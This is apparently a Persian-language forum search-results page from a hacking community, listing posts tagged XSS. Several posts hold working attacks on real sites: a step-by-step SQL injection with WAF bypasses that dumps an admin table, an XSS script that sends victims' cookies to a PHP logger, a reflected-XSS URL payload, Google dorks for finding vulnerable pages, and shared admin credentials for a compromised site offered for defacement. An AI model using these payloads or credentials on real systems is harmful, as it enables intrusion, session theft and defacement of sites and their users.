جستجو در تالارهای گفتگو
در حال نمایش نتایج برای برچسب های 'xss'.
18 نتیجه پیدا شد
-
▀▄▀▄▀▄ بسم الله الرحمن الرحیم ▄▀▄▀▄▀ در این دوره آموزشی شما را به صورت مقدماتی تا پیشرفته با بحث اکسپلویت نویسی آشنا تا شما کاربران محترم انجمن گاردایران به راحتی بتوانید اکسپلویت های خود را بعد از این آموزش در سایت های مختلف ثبت اکسپلویت ثبت کنید.این دوره شامل کار با دورک، معرفی سایتهای ثبت اکسپلویت معتبر، توضیح در مورد قسمتهای مختلف یک اکسپلویت استاندارد و شرایط ثبت آن در سایتهای مختلف، و همچنین ثبت کردن اکسپلویت به صورت کاملا پروژه محور میباشد در این دوره یکی از روشهای پیدا کردن اکسپلویت از طریق حفره امنیتی SQL Injection به صورت کامل گفته خواهد شد توضیح کوتاهی در مورد اکسپلویت برای درک بهتر شما عزیزان اکسپلویت چیست؟ اکسپلویت کدی برای سوء استفاده از حفرههای امنیتی که برای مثال میتوان : برنامههای کاربردی، سیستم عامل، هسته سیستم عامل، وب سرور و به صورت کلی هر نرمافزاری که در یک شبکه و یا رایانه کار میکند , اکسپلویت گفته میشود و همچنین اکسپلویت را میتوان با زبانهای مختلف برنامهنویسی نوشت که متخصصان امنیتی برای اثبات آسیبپذیریهای مختلف اقدام به نوشتن اکسپلویت میکنند.اکسپلویت نویسی بسیار برای امر بچ کردن باگ های مختلف مفید است فصل اول | مقدمه و آشنایی مقدمه دوره معرفی ابزارهای مورد نیاز آشنایی با اصطلاحات و دورک نویسی فصل دوم | اموزش کشف باگ و اکسپلویت نویسی در php نحوه نوشتن استاندارد یک اکسپلویت کشف حفره امنیتی SQL Injection کشف حفره امنیتی Remote File Upload کشف حفره امنیتی Cross Site Scripting کشف حفره امنیتی Remote/Local File Inclusion کشف حفره امنیتی Local File Disclosure کشف حفره امنیتی Remote Command Execution توجه : لطفا در تاپیک اسپم کنید آموزش ها به صورت تصویری همراه با صدا میباشد
-
سلام دوستان داخل این تاپیک می خوام بهتون نسخه 1.2 ابزار ساخت صفحه دیفیس رو معرفی کنم می تونید از این لینک نسخه 1.1 رو مشاهده کنید دوستان خیلی سر عنوان مشکل داشتن برای همین ما اسم ابزار رو گزاشتیم defaker که مخففه deface maker هستش نسخه بعدی این ابزار 2.3 خواهد بود که تغییرات زیادی خواهد داشت ( ساخت دیفیس {برای صفحه وب , برای سیستم عامل ها} ابزار های تست نفوذ وب باگ های { sql , xss , . . . } قابلیت ساخت و کنترل ویروس برای سیستم عامل های مختلف و . . . ) نمایه از ابزار ( نسخه 1.2 ) امیدوارم براتون کار آمد باشه تا فراموش نکردم باید تشکر کنم از دوست خوبمون @SHIWPTS13 که خیلی به من داخل ساخت این ابزار کمک کرد و کمک می کنند در همین تاپیک باید نوید ابزار SMSbomber رو بهتون بدم در دو پلتفرم وب ( می تونید لوکال هاست بیارید بالا یا از سایت استفاده کنید ) سیستم عامل ها ( گرافیکی ) به امید خدا به زودی سعی می کنیم این ابزار ها رو براتون قرار بدیم تا تاپیک های بعدی خدانگهدار در پناه حق 👋 defaker.rar نویسنده : Z🙂D
-
سایت برای دیفیس کردن
Zed پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
سلام دوستان من یک سایت رو زدم ولی هر کاری می کنم تو زون اچ ایرانی ثبت نمیشه ارور 500 سرور میده یوزر پسورد رو میزارم می تونید برید به اسم خودتون دیفیس کنید و ثبتش کنید شاید سایت منو بلاک کرده باشه در هر صورت ادرس سایت : [Hidden Content] یوزر : Zed پسورد : HackerZed ادرس پیج ادمین :[Hidden Content]/_admin/ می تونید شل اپ کنید مث دیفیس کنید یا دیفیس هاتون رو تست کنید -
msa service خدمات MR.MSA | ورژن 1.8 | ورژن 2 به زودی
Sadra پاسخی ارسال کرد برای یک موضوع در تارگت های تمرینی
MSACMS با سلام خدمت تمام دوستان و مدیران عزیز سایت گاردایران در این تاپیک برای شما یک خدماتی رو می خواهم ارائه بدهم نام خدمات msacms هست که سه cms : 1.wordpress 2.drupal 3.joomla رو بالا اوردم تا بتوانید به صورت رایگان با cms ها کار کنید و اسیب پذیری و باگ پرایوت پیدا کنید ، همچنین اسیب پذیری توی در پوسته ها و پلاگین ها و .... این خدمات مثل یک ازمایشگاه می مونه که مثلا : شما میای روی یکی از cms های دلخواه تست اسیب پذیری انجام می دهید و روی پلاگین های ورژن دلخواه و پوسته دلخواه و ... و مثلا یه کسی که خیلی بلد نیست میاد و کار با cms رو یاد میگیره . و هر دوستی اگر خواست درخواست می دهد و یه cms به صورت دلخواه با ورژن دلخواه برای اون نصب می شود . ادرس خدمات MSACMS : MR-MSA.XYZ : username & password یوزرنیم و پسورد cms ها : guardiran اما زمانی که شما یک cms رو انتخاب می کنید یه یوزر و پسورد می خواد که خیلی قوی هست و فقط یک بار باید بزنید .(برای امنیت بالا این کار انجام شده که هر فردی نتواند استفاده کند ) در ورژن ۱ برای دریافت یوزرنیم و پسورد به صورت خصوصی در سرور discord گاردایران و یا در قسمت پیام رسانی گاردایران باید به من پیام می دادید ، اما در ورژن ۱.۲.۰ برای شما یوزر و پسورد رو در فایل ضمیمه قرار دادم . (در تایپک دوم موجود است ) ------------------------------------------------------------------------------------------------------------------------------------------------------------- نکات مهم زمان استفاده از سایت : ۱- پسورد و یوزر cms ها همیشه guardiran هست و نباید تعویض گردد . ۲- هر روز cms ها چک می شود . ۳- هر ۳ روز یک بار در صورت لزوم cms ها ریست می شوند . ۴- فقط تا ۳ فایل و حداکثر ۱۰ مگابایت می تونید اپلود کنید . ۵- برای دریافت رمز عبور حتما باید در انجمن گاردایران ثبت نام کنید . ۶- اگر یک زمان خواستید برای مثال ببینید که می توان در این اپلودر شل اپلود کرد یا نه به جای شل از یک فایل php استفاده کنید . ۷- هیچ زمان شل اپلود نکنید ، چون اکانت شما به صورت خودکار بن می شود و دیگر قابل برگشت نیست (به دلیل شناسایی فایروال ) ۸- هیچ زمان به سایت حملات ddos نزنید چون موفق نمی شوید . ۹ - این cms به صورت مداوم بروز می شود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- امنیت سرور : DDOS در حملات دیداس به شبکه خود دیتاسنتر وارد عمل می شود و آنتی دیداس را فعال می کند در حملات دیداس به سایت ها بخاطر مانیتورینگ لحظه ای که سرور دارد سریعا دسترسی به ایران محدود می شود تا حملات خنثی شود . Firewall در ورژن ۱ سرور دارای فایروال نرم افزاری CSV بود اما در ورژن ۱.۲۰ فایروال cloudflare رو هم اضافه کردیم . Shell سرور دارای انتی شل است و به علاوه فایروال مانع اجرا و استفاده از شل می شود . Backup سایت روزانه بک اپ گیری می شود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- امنیت سایت : سعی کردم روی امنیت سایت کار کنم و سایتی با خدمات خوب و البته امنیت بالا ارائه بدهم و در آینده امنیت بالا تر رفته و سایت بهبود می بخشد. ------------------------------------------------------------------------------------------------------------------------------------------------------------- گزارش باگ : اگر دوستی با باگی در خود سایت مواجه شد و یا دوست داشت مورد امنیتی رو در رابطه با خود سایت گزارش بدهد به صورت خصوصی به من گزارش بده تا رفع بشود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- CMS مورد نظر : اگر دوستی cms خواست تا براش نصب کنم به من پیام خصوصی بدهد . اطلاعات شامل : نوع cms ورژن مورد نظر لینک دانلود ------------------------------------------------------------------------------------------------------------------------------------------------------------- قوانین تاپیک : هر سوال داشتید در بخش سوال و جواب ها ، در غیر این صورت پاسخ داده نمی شود . انتقادات و پیشنهادات خودتون رو به صورت خصوصی به من ارسال کنید . مشکلات و خطا ها رو به صورت خصوصی ارسال کنید . ------------- ------------- ------------- تایید شده توسط مدیران بخش : R3DN4X314 و proxy ------------- ------------- ------------ ورژن 1.0.0 رونمایی می کند : mr-msa.xyz ورژن 1.2.0 رونمایی می کند : mr-msa.xyz ورژن 1.3.0 رونمایی می کند : mr-msa.xyz ورژن 1.4.0 رونمایی می کند : mr-msa.xyz ورژن 1.5.0 رونمایی می کند : mr-msa.xyz این خدمات به صورت کامل متعلق به انجمن تیم امنیتی گاردایران بوده و هر گونه کپی برداری ، اسیب رساندن به خدمات و ... تخلف محسوب می شود و پیگرد قانونی دارد .- 8 پاسخ
-
- msacms tools
- بلودیت
-
(و 79 مورد دیگر)
برچسب زده شده با :
- msacms tools
- بلودیت
- wordpress xss
- wordpress 5.5
- cms security
- ssrf
- bug privet
- تایپو ۳
- mr-msa.xyz
- جوملا
- rfi
- sql injection
- وردپرس
- sqli
- typo3 cms
- bug crowd
- bug bounty
- csrf
- تمرین تست نفوذ و یادگیری cms ها
- wordpress
- joomla
- msacms
- آزمایشگاه تحلیل باگ
- cms
- shell
- آزمایشگاه تست نفوذ
- uploader
- آموزش cms
- web application bug
- madesimple
- bug
- bludit
- cms typo3
- باگ
- lfi rfi
- webapplication hacking
- rfu
- bludit cms
- msacms+
- concrete5
- cms bludit
- cmsmadesimple
- sql injention
- تست امنیت
- waf
- upload
- upload shell
- wordpress them
- database mysql
- firewall
- باگ پرایوت و مکان ازمایشگاهی با msacms | ورژن 1.5.0
- آزمایشگاه
- .xyz
- سیستم مدیریت محتوا
- wordpress 5.5.3
- mr-msa
- hack
- waf bypassing
- امنیت
- typo3
- program
- php
- tools
- web security
- دروپال
- rce
- web application firwall
- اموزش
- web application security
- lfi
- mr.msa
- xss
- drupal
- .cf
- wordpress 5.6
- security
- web design
- web developer
- html
- css
- js
-
با سلام خدمت دوستان عزیز توی این ویدئو آسیب پذیری Sql Injection , XSS , LFi , RFI , RFU رو معرفی کردم. این ویدئو صرفا جهت آشنایی با آسیب پذیری ها و اماده سازی شما برای کار عملی هست و انشالله در آینده برای هر آسیب پذیری یک ویدئو به صورت عملی رکورد میکنم و قرار میدم، لایک و کامنت یادتون نره و چنل رو سابسکرایب کنید در ضمن ویدئو در پیج اینستا @mr.msa3 هم قرار دادم موفق باشید.
-
- sql inejction
- xss
-
(و 11 مورد دیگر)
برچسب زده شده با :
-
𝕚𝕟 𝕥𝕙𝕖 𝕟𝕒𝕞𝕖 𝕠𝕗 𝕘𝕠𝕕 با سلام و احترام خدمت تیم محترم 𝓰𝓾𝓪𝓻𝓭𝓲𝓻𝓪𝓷 در این تاپیک آموزش Html,Css را قرار خواهم داد ودر در دوره های بعدی با html5,css3 و جی کوئری ، بوت استرپ 4 ، پایگاه داده mysql و زبان برنامه نویسی php آشنا خواهید شد پس لطفا در تاپیک ها اسپم وارد نکنید و برای ادامه آموزش ها تاپیک ها را بپسندید
- 8 پاسخ
-
- sqlinjection
- sql
-
(و 19 مورد دیگر)
برچسب زده شده با :
-
••.•´¯`•.•• 🎀 به نام خدا 🎀 ••.•`¯´•.•• با سلام خدمت کاربران محترم انجمن گاردایران در این تاپیک قصد دارم تارگت با نکات خاص رو خدمتتون آموزش بدم ولی قبلش باید یادآوری کنم که این آموزش ها فقط برای آشنایی و یادگیری شماست هر گونه استفاده ی غیرمجاز به عهده ی خود شماست ! در ضمن دوستان عزیزی که به ضمینه ی هک و امنیت علاقه مند هستند میتوانند این آموزش هارو دنبال کنند و با مراجعه به تاپیک های قبلی بنده میتونید این آموزش رو از اول یاد بگیرید چون در اینجا فقط به نکات اشاره خواهد شد نکته : هک ر شدن بچه بازی نیست که بخوای برای آسیب رسوندن به دیگران یا تفریح یادبگیری اگر اهدافت برای یادگیری هک اینه همین الان میتونی اینجارو ترک کنی تارگت : [Hidden Content] با قرار دادن ' آسیب پذیری مشخص خواهد شد [Hidden Content]' حال به سراغ دستورات بعدی برای پیدا کردن ستون های سایت میرویم با استفاده از دستور [Hidden Content] order by 99999-- بسیار خب میبینیم که به کلمه ی order حساس هستش پس بایپس کلمه ی order رو قرار میدیم -> group [Hidden Content] group by 99999-- صفحه load میشود در صورتی که نباید load َود چون هیچ سایتی انقدر ستون ندارد پس بایپسشو قرار میدیم [Hidden Content]' group by 99999--+ انقدر اعداد رو کم میکنیم تا صفحه load شود به 25 خواهیم رسید بدین صورت [Hidden Content]' group by 25--+ حال باید دستورات بعدی برای بیرون کشیدن database اعمال کنیم برای راحتی کارشما که شاید برنامه Hackbar روی مرورگرتون نصب نباشه لیست اعداد رو تهیه کردم که بتونید راحت جای گذاری کنید union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70 خب دستورات رو وارد میکنیم بدین شکل [Hidden Content]' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+ ولی با یک Error معروف رو به رو خواهیم شد پس با دستور /*!00000union*/ بایپس میکنیم [Hidden Content]' /*!00000union*/ select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+ خب حالا میریم سراغ بیرون کشیدن table های سایت [Hidden Content]' /*!00000union*/ select 1,2,3,4,5,6,group_concat(table_name,0x3c62723e),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.tables+where+table_schema=database()--+ میبینیم که دوباره با Error معروف Not Acceptable! مواجه خواهیم شد خیلی راحت با دستوراتی که خدمتتون عرض کردم بایپس کنید بدین شکل [Hidden Content]%27%20/*!00000union*/%20select%201,2,3,4,5,6,/*!00000group_concat(table_name,0x3c62723e)*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*!00000from*/+/*!00000information_schema.tables*/+/*!00000where*/+table_schema=database()--+ سایتی رو معرفی میکنم که برای hex کردن متن کمکتون میکنه Text To Hex بسیار خب میریم سراغ دستورات بعدی شروع به hex کردن admin_log میکنیم و در دستور قرار میدیم (اگر با دستورات آشنا نیستی موضوعات قبلی تاپیک های بنده رو ببین ) [Hidden Content]%27%20/*!00000union*/%20select%201,2,3,4,5,6,/*!00000group_concat(column_name,0x3c62723e)*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*!00000from*/+/*!00000information_schema.columns*/+/*!00000where*/+table_name=0x61646d696e5f6c6f67--+ و دستور بعد برای استخراج داده [Hidden Content]%27%20/*!00000union*/%20select%201,2,3,4,5,6,/*!00000group_concat(uid,0x3a,upass,0x3c62723e)*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*!00000from*/+admin_log--+ دوستان عزیز لطفا از آموزش ها سو استفاده نکنید این آموزش ها فقط برای یادگیری شماست پس لطفا کسی رو دیفیس نکنید سعی میکنم هر روز یک تاپیک در مورد تارگت با نکات خاص قرار بدم لطفا در اینجا اسپم نکنید برای ادامه ی آموزش ها فقط تاپیک را بپسندید موفق باشید admin11:admin11 username & password
- 2 پاسخ
-
- sqlinjectin bypass
- دیفیس
- (و 17 مورد دیگر)
-
با سلام خدمت شما دوستان عزیز یکی از دوستان آموزش باگ xss رو درخواست داشت که قرار دادم . Cross Site Scripting روش کار : با دستورات javascript شما رو به یه لینک ریدایرکت می کنه و کوکی های کاربران رو به شما میده . خب حالا بریم سراغ کارمون .(فقط روی سایت هایی که باگ xss دارند میشه ) مرحله ۱ : برای مثال یه چت روم هست که پیام میدید شما توش به جای پیام این متن رو ارسال میکنید : <script>alert('Error')</script> اگر زمان واردشدن در صفحه در قالب خطا به شما error رو نمایش داد (به صورت هشدار مثلا) یعنی سایت باگ رو داره . مرحله ۲ : در یک سایت که مال خودتون هست یک فایل به نام xss.php درست کنید و این کد php رو درش قرار دهید : <?php $cookie=$_GET['c']; $fo=fopen('cookie.html','a'); fwrite($fo,'Cookie:'.$cookie.'<br><br><br>---------------------------------------<br><br><br>'); fclose($fo); ?> مرحله ۳ : در قسمت ارسال پیام یک پیام دیگر ارسال کنید دارای این کد javascript : <script>document.location="[Hidden Content]=" + document.cookie </script> یا <script>document.location="[Hidden Content]="%2bdocument.cookie </script> به جای site.com ادرس سایت خودتون رو بدید که فایل xss.php رو درش گذاشتید . مرحله ۴ : وارد این ادرس شوید : [Hidden Content] و زمانی که کاربران اون پیام شما رو می بینند ریدایرکت میشن به این ادرس site.com/xss.php و کوکی های اونا توی فایلی به اسم cookie.html برای شما زخیره می شود . نکات مهم زمان انجام این عمل : ۱- هیچ وقت روی سایت خودتون فایل ها رو نسازید چون اگر یه نفر متوجه بشه از سایتتون شکایت میکنه و.... ۲- روی سایت های ایرانی هیچ وقت انجام ندید . ۳- این باگ در جاهای مختلف سایت می تونه باشه مثل باکس جست و جو و بخش نظرات و... ۴- روش های خیلی زیادی برای استفاده از این باگ وجود دارد . اختصاصی Mr.MSA لایک فراموش نشه ! موفق و پیروز باشید .
-
آسیب پذیری جدید moziloCMS moziloCMS.txt
-
این تاپیک ایجاد شده تا تارگت های باگِ xss برای تمرین در اینجا قرار داده بشه لطفا هیچ سوالی درباره این باگ اینجا نپرسید بزودی هم تاپیک آموزشی درباره این باگ میزنیم لطفا فقط قسمت آسیب پذیر سایت رو در اینجا قرار دهید با تشکر
- 48 پاسخ
-
- xss
- Target Training
-
(و 3 مورد دیگر)
برچسب زده شده با :
-
مشکل در نفوذ به سایت دارای باگ sql و سایتی که باگ xss داره
s.a.e.e.d پاسخی ارسال کرد برای یک موضوع در سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
سلام دوستان یه سایت(چت روم خارجی) رو اسکن کردم که باگ xss داره ولی نمیدونم چجوری باید به این باگ نفوذ کرد نتیجه اسکن دوتا روش تو انجمن دیدم که یکی تزریق این کد بود <script>alert(document.cookie)</script> ولی وقتی اینو تو قسمت عمومی چت روم میفرستم کوکی هایی رو میده که تو مرورگر خودم هست و روش دوم ریختن اسکریپت کیلاگر توسط باگ xss بود که اینم باید تو ادمین پیج انجام میدادی که نمیشد وقتی سایت رو اسکن کردم vega یه سری کوکی هم اوورد به نظرتون اونا بدرد میخوره !!!! whatweb هم یه سری کوکی بهم داد اینا به کار میان !!! سایت cpanel داره راهی برای نفوذ به cpanel هست !! از ابزار brutesploit میشه تو پیج ادمین استفاده کرد !!! یا تو صفحه ورود ! از این ابزار برای کرک کردن پسوورد ایمیل میشه استفاده کرد ! سایت یه سری پورت باز داره که نمیدونم به کار میاد یا نه ! لطفا راهنمایی کنید 25-53-80-110-119-143 ============================================================================================================================================================== و سایت دوم که باگ sql داشت (این سوال رو یبار پرسیدم ولی جوابی نگرفتم ) من تو قسمت فراخوانی تیبل ادمین مشکل دارم این سایت دارای باگ = [Hidden Content] اینم تمام تیبل هایی که داره = CHARACTER_SETS,CLIENT_STATISTICS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,INNODB_BUFFER_POOL_CONTENT,INDEX_STATISTICS,KEY_COLUMN_USAGE,PROCESSLIST,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TABLE_STATISTICS,TRIGGERS,USER_PRIVILEGES,USER_STATISTICS,VIE من تیبل USER رو به هگز=(0x55534552) تبدیل کردم و دستورات رو به این شکل وارد کردم ولی نتیجه ای نگرفتم ! [Hidden Content]/news_display.php?id=-1397+union+select+1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+%20information_schema.columns+where+table_name=0x55534552-- اساتید لطفا راهنمایی کنید- 2 پاسخ
-
- cross-site script
- هک چت روم
-
(و 12 مورد دیگر)
برچسب زده شده با :
-
آموزش بدست آوردن کوکی cookie در باگ xss
C0d3!Nj3ct!0n پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
با آموزش تصویری باگ XSS در خدمت شما اعضای خوبمون هستم و در این فیلم آموزشی طریقه بدست آوردن کوکی cookie در باگ xss را بشما آموزش میدم . فیلم با توضیحات کامل ضبط کردم. پسورد : guardiran.org XSS Cookie.rar -
ریختن اسکریپت کیلاگر توسط باگ xss
k.shadow پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
درود ضمن قبولی طاعات و عبادات این اموزشی که براتون اماده کردم درباره ریختن کیلاگر در سایتی هست که اسیب پذیر هست اگه در کد ها مشکلی بود اطلاع بدید درستشون کنم اکثر دوستان فکر میکنند که باگ xss یا همون css کارایی خاصی نداره چون باگ سمت کلاینت هست منم اول همینطوری فکر میکردم دیگه حداکثر کاری که باهش کرد کش روفتن کوکی ها هست ولی اینطور نیست کیلاگر تازه یک جلوه بسیار کم از xss هست چون وقتی ما بتونیم اسکریپت تو کد های html قرار بدیم همه کار میتونیم بکنیم یک چیزی که من خیلی دوست دارم فیشینگ هست که راحت اطلاعات کاربران رو برداریم اسکریپت هم همراه فیلم پیوست کردم بسیار ساده میتونیم یک کیلاگر بزاریم و اطلاعات رو بدزدیم حالا شما فکر کنید یک سایت معروف مثل بانک این باگ رو بده .....!!! xss.rar *****استقبال خوب باشه روش های دیگه رو هم اموزش میدم *********- 5 پاسخ
-
- xss
- هک با باگ xss
-
(و 1 مورد دیگر)
برچسب زده شده با :
-
LifeLock یک شرکت آمریکایی است که خدماتی جهت محافظت از مشتریان در مقابل «سرقت هویت» را ارائه میکند. منظور از سرقت هویت، جعل و سوءاستفاده از هویت افراد در خدمات بانکی و اعتباری و سایر موارد اجتماعی است. به گزارش محققان امنیتی در وبگاه این شرکت یک آسیبپذیری XSS۱ را کشف کردهاند که به مهاجم این امکان را میدهد که با ایجاد یک صفحهی جعلیِ ورود به حساب کاربری، شناسهها و گذرواژههای مشتریان را جمعآوری نماید. LifeLock بلافاصله پس از شناسایی این آسیبپذیری توسط دو محقق امنیتی به نام اریک تیلور و بلک ولش، آن را وصله کردهاند. این آسیبپذیری در صفحهای از این وبگاه کشف شده است که مربوط به معرفی این شرکت به سایر دوستان است و با عنوان Refer Friend شناخته میشود. آسیبپذیری در حالی توسط محققین کشف شد که آنها متوجه یک پارامتر به صورت کد HTML در آدرس URL صفحهی آسیبپذیر شدند، و به این ترتیب با بررسی تزریق سایر کدها به URL متوجه شدند که به راحتی میتوان از این آسیبپذیری در کمپینهای فیشینگ استفاده نمود. این دست آسیبپذیریها، بسیار شایع است و مهم عکسالعمل سریع مسئولان شرکت است تا این آسیبپذیری را وصله نمایند و مانع از بروز خسارات سایبری زیادی شوند.
-
سلام خدمت همه دوستان باگ XSS رو همه میشناسن دیگه توضیح نمیدم اموزشهاش تو انجمن هست امروز میخوام اموزش این باگ در url رو بدم ما تو این روش هیچ پارامتر ورودی رو نداریم مثلا id یا newstitle و ... linke Exploit : [Hidden Content] Target : [Hidden Content] این خط رو به ادرس اضافه کنید r3nw4"</title>'>><BoDy!><BODY onpageshow=prompt(/XSSPOSED/)></ ادرس میشه : [Hidden Content]//r3nw4%22%3C/title%3E%27%3E%3E%3CBoDy!%3E%3CBODY%20onpageshow=prompt%28/XSSPOSED/%29%3E%3C/ میبینید که script اجرا میشه :D
-
دورک های XSS inurl:".php?cmd=" inurl:".php?z=" inurl:".php?q=" inurl:".php?search=" inurl:".php?query=" inurl:".php?searchstring=" inurl:".php?keyword=" inurl:".php?file=" inurl:".php?years=" inurl:".php?txt=" inurl:".php?tag=" inurl:".php?max=" inurl:".php?from=" inurl:".php?author=" inurl:".php?pass=" inurl:".php?feedback=" inurl:".php?mail=" inurl:".php?cat=" inurl:".php?vote=" inurl:search.php?q= inurl:com_feedpostold/feedpost.php?url= inurl:scrapbook.php?id= inurl:headersearch.php?sid= inurl:/poll/default.asp?catid= inurl:/search_results.php?search=
-
با سلام همونطور که شما دوستان می دونید باگ XSS مخفف Cross Site Scripting هست و قصد دارم در این تاپیک بای پس های باگ ( Xss Bypass Command ) را برای اعضاء محترم تیم امنیتی گارد ایران قرار میدم . لطفا اسپم ندید
- 9 پاسخ
-
- Command XSS
- دستورات XSS
-
(و 8 مورد دیگر)
برچسب زده شده با :